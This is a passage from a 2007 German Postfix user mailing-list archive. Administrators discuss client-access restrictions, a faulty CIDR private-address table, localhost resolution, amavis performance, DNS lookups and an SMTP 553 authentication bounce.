eine Kommunikation mit Postfix beginnt ja mit: > > > Nov 9 19:14:49 v1577 postfix/smtpd[13617]: connect from > 160-147-114-200.fibertel.com.ar[200.114.147.160] > > Gibt es einen Prüfmechanismus in Postfix, mit welchem man z.B. eine > Datei mit Regexp integrieren kann z.B. "Wenn der Hostname fibertel > enthält, dann Verbindung beenden" ? > > Wenn ja, wie aktiviere ich den? > > DAmit würde man ja Postfix von der nachgelagerten Bearbeitung entlasten. Was genau willst du erreichen und wovon genau soll Postfix entlastet werden? Postfix wartet bei Standardeinstellung ohnehin bis RCPT TO ab, bevor die Mail abgewiesen wird. Wenn du mehr willst, müsstest du "smtpd_delay_reject = no" setzen und einen check_client_access in smtpd_client_restrictions verwenden. Auch dies beendet die Verbindung jedoch nicht. Wenn du das erreichen willst, dann kannst du nur "421 Client not allowed" verwenden mit dem Risiko, dass echte Mailserver wegen des 4xx Codes ständig wiederankommen. Schau dir mal das STRESS_README von der Postfix-Seite an. Da stehen einige Sachen, wie man einem überlastetem Server Luft verschaffen kann: http://www.postfix.org/STRESS_README.html -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From p.heinlein at heinlein-support.de Sat Nov 10 12:36:37 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Sat, 10 Nov 2007 12:36:37 +0100 Subject: [Postfixbuch-users] Komisches verhalten von Courier IMAP-ssl In-Reply-To: <47348FA0.8010809@thoma.cc> References: <47348FA0.8010809@thoma.cc> Message-ID: <200711101236.40147.p.heinlein@heinlein-support.de> Am Freitag, 9. November 2007 schrieb Maximilian Thoma: > ich habe aus meinem incoming ordner alle mails aus cur in ein > mailarchiv mit mv auf der console verschoben. (geht schneller, ca. 6000 > Mails) hat alles soweit geklappt, doch wenn ich das archiv aufmache Das ist auch okay, das kannst und darfst Du tun (mache ich auch). > geht die cpu auslastung auf 60% und er zeigt auch nach längerem warten > keine mails an. schaut man sich das ganze jetzt auf der festplatte an > haben sich die mails irgendwie vervielfacht. das log zeigt leider auch > nichts verwertbares an bzw. man sieht halt nur die normalen login / > logouts. Das ist meiner Erfahrung nach eher ein Problem des Clients. Nutzt Du Disconnected IMAP / offline IMAP? Manchmal spielen die Mailclients verrückt und versuchen dann im Zuge der Synchronisation die Mails hochzuladen. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de *** Secure Linux Administration Conference *** 6. + 7.12.2007 http://www.heinlein-support.de/slac From olaf.uhlemann at sertrec.de Mon Nov 12 13:45:50 2007 From: olaf.uhlemann at sertrec.de (Olaf Uhlemann) Date: Mon, 12 Nov 2007 13:45:50 +0100 Subject: [Postfixbuch-users] Mails werden abgewiesen: mx in serdersaddress in in private address space ? Message-ID: <002e01c82529$f4f6a1f0$1e00a8c0@rohan> Ich sollte eine Mail von adobe.com bekommen - bekomme ich aber nicht. Mein Log sagt mir: NOQUEUE: reject: RCPT from marlin.euro-stream.com[x.x.x.x]: 554 : Sender address rejected: mx for senderaddress is in private address space!; from= to= proto=ESMTP helo= Disconnected from marlin.euro-stream-com[x.x.x.x] Nun meine Frage: liegt das Problem bei mir oder bei adobe? Mit freundlichen Grüßen Olaf Uhlemann From postfixbuch-users at japantest.homelinux.com Mon Nov 12 14:13:48 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Mon, 12 Nov 2007 14:13:48 +0100 Subject: [Postfixbuch-users] Mails werden abgewiesen: mx in serdersaddress in in private address space ? In-Reply-To: <002e01c82529$f4f6a1f0$1e00a8c0@rohan> References: <002e01c82529$f4f6a1f0$1e00a8c0@rohan> Message-ID: <4738518C.1090101@japantest.homelinux.com> Olaf Uhlemann wrote: > Ich sollte eine Mail von adobe.com bekommen - bekomme ich aber nicht. > > Mein Log sagt mir: > NOQUEUE: reject: RCPT from marlin.euro-stream.com[x.x.x.x]: 554 > : Sender address rejected: mx for senderaddress is > in private address space!; from= > to= proto=ESMTP helo= > Disconnected from marlin.euro-stream-com[x.x.x.x] > > Nun meine Frage: liegt das Problem bei mir oder bei adobe? Vermutlich bei dir. Überprüfe die Tabelle, die check_sender_mx_access abfragt. -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From olaf.uhlemann at sertrec.de Mon Nov 12 14:29:19 2007 From: olaf.uhlemann at sertrec.de (Olaf Uhlemann) Date: Mon, 12 Nov 2007 14:29:19 +0100 Subject: [Postfixbuch-users] Mails werden abgewiesen: mx in serdersaddress in in private address space ? In-Reply-To: <4738518C.1090101@japantest.homelinux.com> Message-ID: <003b01c82530$08185750$1e00a8c0@rohan> > > Ich sollte eine Mail von adobe.com bekommen - bekomme ich aber nicht. > > > > Mein Log sagt mir: > > NOQUEUE: reject: RCPT from marlin.euro-stream.com[x.x.x.x]: 554 > > : Sender address rejected: mx for > senderaddress > > is in private address space!; from= > > to= proto=ESMTP > > helo= Disconnected from > > marlin.euro-stream-com[x.x.x.x] > > > > Nun meine Frage: liegt das Problem bei mir oder bei adobe? > > Vermutlich bei dir. Überprüfe die Tabelle, die > check_sender_mx_access abfragt. > > -- > Sandy > In meiner main.cf steht smtp_recipient_restriction= . check_sender_mx_access cidr:/etc/postfix/sendermx_private_ip . In der sendermx_private_ip steht: 127.0.0.0/8 reject mx for senderaddress is localhost! 10.0.0.0/8 reject mx for senderaddress is in private address space! 192.0.0.0/8 reject mx for senderaddress is in private address space! Was ist den daran falsch? Olaf Uhlemann From oliver at olivergast.de Mon Nov 12 14:23:36 2007 From: oliver at olivergast.de (oliver at olivergast.de) Date: Mon, 12 Nov 2007 14:23:36 +0100 (CET) Subject: [Postfixbuch-users] Probleme bei Mailzustellung (localhost = externe IP?) Message-ID: <20071112132336.777C0247@atmail.b-one.net> Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From nighthawk at gmail.com Mon Nov 12 14:27:48 2007 From: nighthawk at gmail.com (nighthawk) Date: Mon, 12 Nov 2007 14:27:48 +0100 Subject: [Postfixbuch-users] Mails werden abgewiesen: mx in serdersaddress in in private address space ? In-Reply-To: <003b01c82530$08185750$1e00a8c0@rohan> References: <4738518C.1090101@japantest.homelinux.com> <003b01c82530$08185750$1e00a8c0@rohan> Message-ID: <7832fd560711120527l2b5afcf0y4ebdc4752c1b6af8@mail.gmail.com> > In der sendermx_private_ip steht: > 127.0.0.0/8 reject mx for senderaddress is localhost! > 10.0.0.0/8 reject mx for senderaddress is in private address space! > 192.0.0.0/8 reject mx for senderaddress is in private address space! > > Was ist den daran falsch? Die letzte Zeile. Der dort angegebene Adressbereich ist mitnichten in dieser Form in RFC1918 angegeben. From sven at root2.schroederhost.de Mon Nov 12 14:29:12 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Mon, 12 Nov 2007 14:29:12 +0100 Subject: [Postfixbuch-users] Cron mailt nicht In-Reply-To: <47346450.6040100@reba-eno.de> References: <4734300D.2050409@root2.schroederhost.de> <47343305.5020006@thoma.cc> <47343BF1.5090600@root2.schroederhost.de> <47344FF2.2010709@thoma.cc> <47345631.1070703@root2.schroederhost.de> <4734590A.5040702@reba-eno.de> <47346039.1080400@root2.schroederhost.de> <473461ED.6050409@root2.schroederhost.de> <47346450.6040100@reba-eno.de> Message-ID: <47385528.9040000@root2.schroederhost.de> Peter Bauernfeind schrieb: > Welches Mailcommando meinst du? Und wer soll dir dann mailen? Welches > Programm in cron? Wie sehen die Konfigurationsdateien dazu aus? > > > > ich seh gerade, dass meine vermissten Mails alle bei nobody gelandet sind... From mhaegele at linuxrocks.dyndns.org Mon Nov 12 14:34:28 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Mon, 12 Nov 2007 14:34:28 +0100 Subject: [Postfixbuch-users] Mails werden abgewiesen: mx in serdersaddress in in private address space ? In-Reply-To: <7832fd560711120527l2b5afcf0y4ebdc4752c1b6af8@mail.gmail.com> References: <4738518C.1090101@japantest.homelinux.com> <003b01c82530$08185750$1e00a8c0@rohan> <7832fd560711120527l2b5afcf0y4ebdc4752c1b6af8@mail.gmail.com> Message-ID: <47385664.8060806@linuxrocks.dyndns.org> nighthawk schrieb: >> In der sendermx_private_ip steht: >> 127.0.0.0/8 reject mx for senderaddress is localhost! >> 10.0.0.0/8 reject mx for senderaddress is in private address space! >> 192.0.0.0/8 reject mx for senderaddress is in private address space! >> >> Was ist den daran falsch? > > Die letzte Zeile. Der dort angegebene Adressbereich ist mitnichten in > dieser Form in RFC1918 angegeben. Vermutlich sollte das 192.168.0.0/16 heissen ;-). -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From nospam at thoma.cc Mon Nov 12 14:39:32 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Mon, 12 Nov 2007 14:39:32 +0100 Subject: [Postfixbuch-users] Probleme bei Mailzustellung (localhost = externe IP?) In-Reply-To: <20071112132336.777C0247@atmail.b-one.net> References: <20071112132336.777C0247@atmail.b-one.net> Message-ID: <47385794.8000505@thoma.cc> oliver at olivergast.de schrieb: > > Hallo, > > > > wollte heute morgen eine Procmail-Regel erstellen. Dabei habe ich einige > andere Einstellungen verändert. Nachdem das mit der Procmail-Regel leider > nicht ganz geklappt hat, habe ich, so denke ich zumindest, alle Änderungen > wieder rückgängig gemacht. Alle Mails werden in die Mailqueue gestellt und nicht zugestellt. > > > > > > > > Hier mal ein Auszug aus dem Log: > > > > Nov 12 12:37:39 hermes postfix/qmgr[4754]: A95D54D11A: > to=, relay=none, delay=11728, > delays=11716/13/0/0, dsn=4.4.1, status=deferred (delivery temporarily > suspended: connect to localhost[83.220.132.8]: Connection refused) > > Nov 12 12:37:40 hermes postfix/qmgr[4754]: A96C34D14A: > to=, relay=none, delay=11741, delays=11729/13/0/0, > dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to > localhost[83.220.132.8]: Connection refused) > > Nov 12 12:37:40 hermes postfix/qmgr[4754]: AECEA4D186: > to=, relay=none, delay=11760, delays=11748/13/0/0, > dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to > localhost[83.220.132.8]: Connection refused) > > > > Das merkwürdige ist, dass localhost nicht localhost zu sein scheint, sondern > in Klammern dahinter steht die IP unseres Hosters. > > > > Jemand eine Idee? > > > > Gruß Oliver > > was steht denn in deiner /etc/hosts drin ? ist da evtl. localhost falsch zugeordnet. gruß maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma PGP: http://mirror.thoma.cc/pgp/0x6AC4976A.asc Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From driessen at fblan.de Mon Nov 12 15:07:51 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 12 Nov 2007 15:07:51 +0100 Subject: [Postfixbuch-users] Mails werden abgewiesen: mx in serdersaddress in in private address space ? In-Reply-To: <47385664.8060806@linuxrocks.dyndns.org> References: <4738518C.1090101@japantest.homelinux.com> <003b01c82530$08185750$1e00a8c0@rohan><7832fd560711120527l2b5afcf0y4ebdc4752c1b6af8@mail.gmail.com> <47385664.8060806@linuxrocks.dyndns.org> Message-ID: <001f01c82535$69d8cf10$0565a8c0@uwe> Matthias Haegele schrieb: > nighthawk schrieb: > >> 192.0.0.0/8 reject mx for senderaddress is in private > address space! > >> > >> Was ist den daran falsch? > > > > Die letzte Zeile. Der dort angegebene Adressbereich ist > mitnichten in > > dieser Form in RFC1918 angegeben. > > Vermutlich sollte das 192.168.0.0/16 heissen ;-). > 192.0.2.0/24 ist ebenfalls reserviert Internet Assigned Numbers Authority RESERVED-192 (NET-192-0-0-0-1) 192.0.0.0 - 192.0.127.255 Internet Assigned Numbers Authority IANA (NET-192-0-2-0-1) 192.0.2.0 - 192.0.2.255 ich glaube das waren besondere Testnetze Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From j.reisslein at schmitt-aufzuege.de Mon Nov 12 14:39:37 2007 From: j.reisslein at schmitt-aufzuege.de (=?iso-8859-1?Q?J=F6rg_Rei=DFlein?=) Date: Mon, 12 Nov 2007 14:39:37 +0100 Subject: [Postfixbuch-users] SMTP 553 Message-ID: <018c01c82531$780fdd70$02d2b40a@EDVPC02> Hallo zusammen, bitte um Erklärung für folgenden Vorgang. User schickt eine Mail an Inode.At, diese bounced zurück mit Authentification Required?? SMTP-Auth ist im MUA aktiviert. Betreff: Mail delivery failed: returning message to sender This message was created automatically by mail delivery software. A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed: sandra.horak at inode.at SMTP error from remote mailer after MAIL FROM: SIZE=25539: host 213.46.255.2 [213.46.255.2]: 553 Authentication is required to send mail as ------ This is a copy of the message's headers. ------ Return-path: Received: from [193.158.105.38] (port=11731 helo=mail.schmitt-aufzuege.de) by smartmx-07.inode.at with esmtps (TLS-1.0:DHE_RSA_AES_256_CBC_SHA:32) (Exim 4.50) id 1IrZAa-00016d-Mm for sandra.horak at inode.at; Mon, 12 Nov 2007 14:17:41 +0100 Received: from localhost (localhost [127.0.0.1]) by mail.schmitt-aufzuege.de (Schmitt+Sohn Mailsecurity) with ESMTP id 007AEDBA1A for ; Mon, 12 Nov 2007 14:17:33 +0100 (CET) X-Virus-Scanned: Schmitt+Sohn AntiSpam/Antivir running at schmitt-aufzuege.de Received: from mail.schmitt-aufzuege.de ([127.0.0.1]) by localhost (mail.schmitt-aufzuege.de [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id 9yIZHpWx5o-4 for ; Mon, 12 Nov 2007 14:17:31 +0100 (CET) Received: from zn19opc11 (unknown [10.221.210.11]) (using TLSv1 with cipher RC4-MD5 (128/128 bits)) (Client did not present a certificate) by mail.schmitt-aufzuege.de (Schmitt+Sohn Mailsecurity) with ESMTP id 2C6DBDA16A for ; Mon, 12 Nov 2007 14:17:28 +0100 (CET) From: "Eva Kirschenhofer" To: Subject: =?iso-8859-1?Q?Kleing=FCteraufzug?= Date: Mon, 12 Nov 2007 14:17:25 +0100 Message-ID: MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_NextPart_000_0036_01C82536.C2199FA0" X-Mailer: Microsoft Office Outlook 11 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3138 Thread-Index: AcglLl3RmFUULkf2Sw+hk2cho9FJbA== Disposition-Notification-To: "Eva Kirschenhofer" X-Inode-Scanner: clean Hier die entsprechenden Einträge aus dem Maillog. mail:~ # mailgrep.pl -q -s 814D2D466B postfix/.*(814D2D466B) Nov 12 14:26:09 mail postfix/smtpd[22334]: 814D2D466B: client=unknown[10.221.210.11], sasl_method=LOGIN, sasl_username=ekirschenhofer Nov 12 14:26:10 mail postfix/cleanup[27725]: 814D2D466B: message-id= Nov 12 14:26:10 mail postfix/qmgr[4956]: 814D2D466B: from=, size=25230, nrcpt=1 (queue active) Nov 12 14:26:17 mail postfix/smtp[28456]: 814D2D466B: to=, relay=127.0.0.1[127.0.0.1], delay=8, status=sent (250 2.6.0 Ok, id=28188-10, from MTA([127.0.0.1]:10025): 250 Ok: queued as 81650DC826) Nov 12 14:26:17 mail postfix/qmgr[4956]: 814D2D466B: removed mail:~ # mailgrep.pl -q -s 81650DC826 postfix/.*(81650DC826) Nov 12 14:26:17 mail postfix/smtpd[27406]: 81650DC826: client=localhost[127.0.0.1] Nov 12 14:26:17 mail postfix/cleanup[27725]: 81650DC826: message-id= Nov 12 14:26:17 mail postfix/qmgr[4956]: 81650DC826: from=, size=25744, nrcpt=1 (queue active) Nov 12 14:26:17 mail postfix/smtp[28456]: 814D2D466B: to=, relay=127.0.0.1[127.0.0.1], delay=8, status=sent (250 2.6.0 Ok, id=28188-10, from MTA([127.0.0.1]:10025): 250 Ok: queued as 81650DC826) Nov 12 14:26:27 mail postfix/smtp[28469]: 81650DC826: to=, relay=e-mail.inode.at[213.229.60.101], delay=10, status=sent (250 OK id=1IrZJ0-0000WO-3y) Nov 12 14:26:27 mail postfix/qmgr[4956]: 81650DC826: removed Danke und Gruß J. Reisslein -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From peter.bauernfeind at reba-eno.de Mon Nov 12 15:10:27 2007 From: peter.bauernfeind at reba-eno.de (Peter Bauernfeind) Date: Mon, 12 Nov 2007 15:10:27 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?Postfix_Namensaufl=F6sung?= Message-ID: <47385ED2.8040003@reba-eno.de> Hallo, ich habe Schwierigkeiten meinen Netzinternen DNS zu verwenden. Oder anders gesagt wie unterscheidet sich der interne vom externen DNS? Ich finde einfach den Fehler nicht. Ich sende zweimal eine Mail von meinem GMX-Account, zuerst wird der interne DNS verwendet und die Mail wird wegen "Recipient address rejected: Domain not found" abgelehnt. Dann habe ich einen externen DNS verwendet und die Mail wird eingeliefert. Mail inerhalb des internen Netzes werden mit beiden DNS eingeliefert. #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#* reba-dsl:/var/log# dig mail.gmx.de ; <<>> DiG 9.3.4 <<>> mail.gmx.de ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23335 ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 2, ADDITIONAL: 2 ;; QUESTION SECTION: ;mail.gmx.de. IN A ;; ANSWER SECTION: mail.gmx.de. 82154 IN CNAME mail.gmx.net. mail.gmx.net. 2638 IN A 213.165.64.20 mail.gmx.net. 2638 IN A 213.165.64.21 ;; AUTHORITY SECTION: gmx.net. 81832 IN NS ns.schlund.de. gmx.net. 81832 IN NS dns.gmx.net. ;; ADDITIONAL SECTION: ns.schlund.de. 81831 IN A 195.20.224.97 dns.gmx.net. 83574 IN A 213.165.64.1 ;; Query time: 67 msec ;; SERVER: 192.168.50.75#53(192.168.50.75) ;; WHEN: Fri Nov 9 20:26:07 2007 ;; MSG SIZE rcvd: 162 reba-dsl:/etc/resolvconf/run# dig mx mail.gmx.de ; <<>> DiG 9.3.4 <<>> mx mail.gmx.de ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30740 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;mail.gmx.de. IN MX ;; ANSWER SECTION: mail.gmx.de. 80759 IN CNAME mail.gmx.net. ;; AUTHORITY SECTION: gmx.net. 3398 IN SOA dns.gmx.net. hostmaster.gmx.net. 2007110700 28800 7200 604800 3600 ;; Query time: 54 msec ;; SERVER: 192.168.50.75#53(192.168.50.75) ;; WHEN: Fri Nov 9 20:29:22 2007 ;; MSG SIZE rcvd: 106 reba-dsl:/etc/resolvconf/run# dig any mail.gmx.de ; <<>> DiG 9.3.4 <<>> any mail.gmx.de ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42786 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2 ;; QUESTION SECTION: ;mail.gmx.de. IN ANY ;; ANSWER SECTION: mail.gmx.de. 80727 IN CNAME mail.gmx.net. ;; AUTHORITY SECTION: gmx.de. 80416 IN NS dns.gmx.net. gmx.de. 80416 IN NS ns.schlund.de. ;; ADDITIONAL SECTION: ns.schlund.de. 80404 IN A 195.20.224.97 dns.gmx.net. 82147 IN A 213.165.64.1 ;; Query time: 67 msec ;; SERVER: 192.168.50.75#53(192.168.50.75) ;; WHEN: Fri Nov 9 20:29:54 2007 ;; MSG SIZE rcvd: 130 Nov 9 20:30:56 reba-dsl postfix/smtpd[2712]: connect from mail.gmx.net[213.165.64.20] Nov 9 20:30:56 reba-dsl postfix/smtpd[2712]: NOQUEUE: reject: RCPT from mail.gmx.net[213.165.64.20]: 450 4.1.2 : Recipient address rejected: Domain not found; from= to= proto=SMTP helo= Nov 9 20:30:56 reba-dsl postfix/smtpd[2712]: disconnect from mail.gmx.net[213.165.64.20] #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#* reba-dsl:/var/log# dig mail.gmx.de ; <<>> DiG 9.3.4 <<>> mail.gmx.de ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37140 ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 2, ADDITIONAL: 2 ;; QUESTION SECTION: ;mail.gmx.de. IN A ;; ANSWER SECTION: mail.gmx.de. 81715 IN CNAME mail.gmx.net. mail.gmx.net. 2199 IN A 213.165.64.21 mail.gmx.net. 2199 IN A 213.165.64.20 ;; AUTHORITY SECTION: gmx.net. 81393 IN NS dns.gmx.net. gmx.net. 81393 IN NS ns.schlund.de. ;; ADDITIONAL SECTION: ns.schlund.de. 81392 IN A 195.20.224.97 dns.gmx.net. 83135 IN A 213.165.64.1 ;; Query time: 65 msec ;; SERVER: 212.114.152.1#53(212.114.152.1) ;; WHEN: Fri Nov 9 20:13:26 2007 ;; MSG SIZE rcvd: 162 reba-dsl:~# dig mx mail.gmx.de ; <<>> DiG 9.3.4 <<>> mx mail.gmx.de ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43078 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;mail.gmx.de. IN MX ;; ANSWER SECTION: mail.gmx.de. 80961 IN CNAME mail.gmx.net. ;; AUTHORITY SECTION: gmx.net. 3600 IN SOA dns.gmx.net. hostmaster.gmx.net. 2007110700 28800 7200 604800 3600 ;; Query time: 69 msec ;; SERVER: 212.114.152.1#53(212.114.152.1) ;; WHEN: Fri Nov 9 20:16:00 2007 ;; MSG SIZE rcvd: 106 reba-dsl:~# dig any mail.gmx.de ; <<>> DiG 9.3.4 <<>> any mail.gmx.de ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32275 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2 ;; QUESTION SECTION: ;mail.gmx.de. IN ANY ;; ANSWER SECTION: mail.gmx.de. 80882 IN CNAME mail.gmx.net. ;; AUTHORITY SECTION: gmx.de. 80571 IN NS ns.schlund.de. gmx.de. 80571 IN NS dns.gmx.net. ;; ADDITIONAL SECTION: ns.schlund.de. 80559 IN A 195.20.224.97 dns.gmx.net. 82302 IN A 213.165.64.1 ;; Query time: 58 msec ;; SERVER: 212.114.152.1#53(212.114.152.1) ;; WHEN: Fri Nov 9 20:17:19 2007 ;; MSG SIZE rcvd: 130 Nov 9 23:46:00 reba-dsl postfix/smtpd[2839]: connect from mail.gmx.net[213.165.64.20] Nov 9 23:46:01 reba-dsl postfix/smtpd[2839]: BC08F17C048: client=mail.gmx.net[213.165.64.20] Nov 9 23:46:01 reba-dsl postfix/cleanup[2843]: BC08F17C048: message-id=<01C8232A.DC00FCF0.peter.bauernfeind at gmx.example> Nov 9 23:46:01 reba-dsl postfix/qmgr[2782]: BC08F17C048: from=, size=1111, nrcpt=1 (queue active) Nov 9 23:46:02 reba-dsl postfix/smtpd[2839]: disconnect from mail.gmx.net[213.165.64.20] Nov 9 23:46:02 reba-dsl postfix/smtp[2844]: BC08F17C048: to=,relay=192.168.50.75[192.168.50.75]:25, delay=1.4, delays=0.7/0.12/0.17/0.43, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 4D2523DE88) Nov 9 23:46:02 reba-dsl postfix/qmgr[2782]: BC08F17C048: removed Mit freundlichem Gruß Peter Bauernfeind From ralf.prengel at rprengel.de Mon Nov 12 16:50:37 2007 From: ralf.prengel at rprengel.de (Ralf Prengel) Date: Mon, 12 Nov 2007 16:50:37 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel Message-ID: <4738764D.1020506@rprengel.de> Hallo, ich habe hier eine tagesaktuelle Suse 10.1 Installation in der jede Mail zwischen 20 und 30 Sekunden für die Test benötigt die amavis auslöst. DNS-Probleme dürften ausscheiden da ich einen eigenen Server nutze und dessen Logfiles auch unauffällig sind. Sobald ich aus der master.cf testweise alles zum Thema amavis auskonfiguriere sehe ich im fetchmail-Logfile das die Mails in einem Bruchteil der Zeit durchlaufen. Es ist also ein lokales Problem. Im nächsten Schritt habe ich testweise die Mailscanner abgeschaltet und habe die Durchlaufzeit zumindestens halbiert. Mein Problem scheint zu sein das die Behandlung meines internen catchalls Empängers reichlich Zeit frisst. Ich komme nicht darum alle Trümemr erst mal anzunehmen aber die Frage wäre ob man Mails an eine bestimmte Mailadresse von der Verarbeitung mit amavis bzw. innerhalb von amavis von allen Tests ausschliessen kann weil eh klar ist das es zu 99.999 % Schrott ist. Im Jahr sind da halt 2 bis 3 Mails diw man doch ggf. retten sollte da da ggf. Umsatz dran hängen kann. Gruß und Dank für Tips Ralf Prengel From nospam at thoma.cc Mon Nov 12 16:55:44 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Mon, 12 Nov 2007 16:55:44 +0100 Subject: [Postfixbuch-users] amavis Performance zur zeit mieserabel In-Reply-To: <4738764D.1020506@rprengel.de> References: <4738764D.1020506@rprengel.de> Message-ID: <47387780.1080400@thoma.cc> Ralf Prengel schrieb: > Hallo, > > ich habe hier eine tagesaktuelle Suse 10.1 Installation in der jede Mail > zwischen 20 und 30 Sekunden für die Test benötigt die amavis auslöst. > DNS-Probleme dürften ausscheiden da ich einen eigenen Server nutze und > dessen Logfiles auch unauffällig sind. > Sobald ich aus der master.cf testweise alles zum Thema amavis > auskonfiguriere sehe ich im fetchmail-Logfile das die Mails in einem > Bruchteil der Zeit durchlaufen. Es ist also ein lokales Problem. > Im nächsten Schritt habe ich testweise die Mailscanner abgeschaltet und > habe die Durchlaufzeit zumindestens halbiert. > > Mein Problem scheint zu sein das die Behandlung meines internen > catchalls Empängers reichlich Zeit frisst. Ich komme nicht darum alle > Trümemr erst mal anzunehmen aber die Frage wäre ob man Mails an eine > bestimmte Mailadresse von der Verarbeitung mit amavis bzw. innerhalb > von amavis von allen Tests ausschliessen kann weil eh klar ist das es zu > 99.999 % Schrott ist. Im Jahr sind da halt 2 bis 3 Mails diw man doch > ggf. retten sollte da da ggf. Umsatz dran hängen kann. > > Gruß und Dank für Tips > > Ralf Prengel @spam_lovers_maps = @bypass_spam_checks_maps = ( [ qw( user1 at example.com user2 at example.com ) ], ); -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma PGP: http://mirror.thoma.cc/pgp/0x6AC4976A.asc Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From driessen at fblan.de Mon Nov 12 17:59:09 2007 From: driessen at fblan.de (Uwe Driessen) Date: Mon, 12 Nov 2007 17:59:09 +0100 Subject: [Postfixbuch-users] SMTP 553 In-Reply-To: <018c01c82531$780fdd70$02d2b40a@EDVPC02> References: <018c01c82531$780fdd70$02d2b40a@EDVPC02> Message-ID: <002901c8254d$57afaee0$0565a8c0@uwe> Jörg Reißlein schrieb: nimm mal nur text als Format HTML liest sich sche.... >Nov 12 14:26:09 mail postfix/smtpd[22334]: 814D2D466B: > client=unknown[10.221.210.11], sasl_method=LOGIN, > sasl_username=ekirschenhofer hat sich angemeldet > > Nov 12 14:26:10 mail postfix/cleanup[27725]: 814D2D466B: > message-id= > mail wurde angenommen > Nov 12 14:26:10 mail postfix/qmgr[4956]: 814D2D466B: > from=, size=25230, > nrcpt=1 (queue active) > > Nov 12 14:26:17 mail postfix/smtp[28456]: 814D2D466B: > to=, relay=127.0.0.1[127.0.0.1], > delay=8, status=sent (250 2.6.0 Ok, id=28188-10, from > MTA([127.0.0.1]:10025): 250 Ok: queued as 81650DC826) durch die internen Filter durch > > Nov 12 14:26:17 mail postfix/qmgr[4956]: 814D2D466B: removed > > mail:~ # mailgrep.pl -q -s 81650DC826 > > postfix/.*(81650DC826) > > Nov 12 14:26:17 mail postfix/smtpd[27406]: 81650DC826: > client=localhost[127.0.0.1] > > Nov 12 14:26:17 mail postfix/cleanup[27725]: 81650DC826: > message-id= > > Nov 12 14:26:17 mail postfix/qmgr[4956]: 81650DC826: > from=, size=25744, > nrcpt=1 (queue active) > > Nov 12 14:26:17 mail postfix/smtp[28456]: 814D2D466B: > to=, relay=127.0.0.1[127.0.0.1], > delay=8, status=sent (250 2.6.0 Ok, id=28188-10, from > MTA([127.0.0.1]:10025): 250 Ok: queued as 81650DC826) > > Nov 12 14:26:27 mail postfix/smtp[28469]: 81650DC826: > to=, > relay=e-mail.inode.at[213.229.60.101], delay=10, status=sent > (250 OK id=1IrZJ0-0000WO-3y) hier ist eine Auslieferung zu sehen > > Nov 12 14:26:27 mail postfix/qmgr[4956]: 81650DC826: removed > aber da fehlt so ein bischen was wirst nicht umhin kommen von hand die zusammenhängenden Log Zeilen nochmal zusammen zu suchen. aus den Einträgen geht eigentlich nur hervor das versendet wurde aber nicht was da Bounced oder rejecte. sollte da evtl. ein automatischer Zustellbericht oder Lesebestätigung angefordert worden sein??? Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From cite at incertum.net Mon Nov 12 18:31:49 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Mon, 12 Nov 2007 18:31:49 +0100 Subject: [Postfixbuch-users] SMTP 553 In-Reply-To: 